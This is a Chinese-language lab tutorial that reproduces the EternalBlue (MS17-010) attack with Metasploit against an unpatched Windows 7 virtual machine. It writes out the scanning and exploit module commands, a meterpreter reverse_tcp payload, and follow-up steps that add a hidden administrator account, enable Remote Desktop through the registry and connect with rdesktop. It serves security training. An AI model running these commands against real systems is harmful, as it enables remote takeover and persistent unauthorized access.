复现环境:
-
攻击机:Linux kali(192.168.119.128)
-
靶机:Windows 7 x64(192.168.119.129)
实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!
关闭防火墙
查看两个机器的ip
确认两个机器 能互相ping通
复现过程:
1、主机发现:
登录 kali linux,用 nmap 探测本网段存活主机
可以看到,靶机的445端口是开放的,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞。
2、使用MSF的永恒之蓝漏洞模块
打开MSF:msfconsole(就是一个安全漏洞检测工具,里面分很多模块)
搜索 ms17-010 代码:search ms17_010
这里可以得到一些工具,其中
auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。
3、使用ms17-010扫描模块,对靶机进行扫描:
使用扫描模块:
use auxiliary/scanner/smb/smb_ms17_010
设置目标IP:
set rhosts 192.168.119.129
执行扫描:run
出现以上情况说明有漏洞。
4、使用ms17-010攻击模块,对靶机进行攻击
使用攻击模块:
use exploit/windows/smb/ms17_010_eternalblue
如果出现以下画面
则需要输入 set payload windows/x64/meterpreter/reverse_tcp
则可以成功执行
设置攻击目标ip:
set rhosts 192.168.119.129
run执行攻击
ok攻击完成
5、得到靶机shell
出现以下画面表示成功植入
你可以做你想做的命令
输入shell得到对方控制台
输入:chcp 65001 可解决乱码问题。
6、通过shell对靶机进行控制
1、创建新用户 ,语法:net user 用户名 密码 /add
net user sss 123456 /add
查看用户信息,命令:net user
出现以上画面则表示添加成功了
2、将用户sss添加至管理员组
net localgroup administrators sss /add
像上面一样表示添加成功
3、开启远程桌面功能
查看3389端口状态:netstat -ano(3389是计算机远程端口)
发现没有3389端口
输入:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
则可开启3389端口
快捷键ctrl+alt+t另起一个终端输入命令:(要重新打开一个终端,在输入命令,我被困了一个小时就因为一直原本的终端中输入命令,rdesktop是一个程序,所以要在kali中打开,我是这么理解的。)
rdesktop 192.168.119.129:3389
就ok了